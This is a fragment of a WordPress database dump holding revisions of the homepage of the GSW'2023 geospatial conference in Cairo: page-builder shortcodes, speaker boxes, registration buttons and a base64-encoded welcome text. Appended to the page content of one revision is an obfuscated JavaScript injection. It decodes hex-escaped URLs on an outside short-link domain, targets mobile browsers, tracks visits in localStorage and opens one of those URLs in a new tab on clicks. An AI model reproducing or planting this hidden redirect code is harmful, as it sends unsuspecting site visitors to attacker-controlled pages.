jb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text layout=\"layout_4\" dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 12:18:55','2022-10-20 12:18:55','',2167,'https://gsw2023.com/?p=2914',0,'revision','',0),
(2915,1,'2022-10-20 12:19:37','2022-10-20 12:19:37','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" 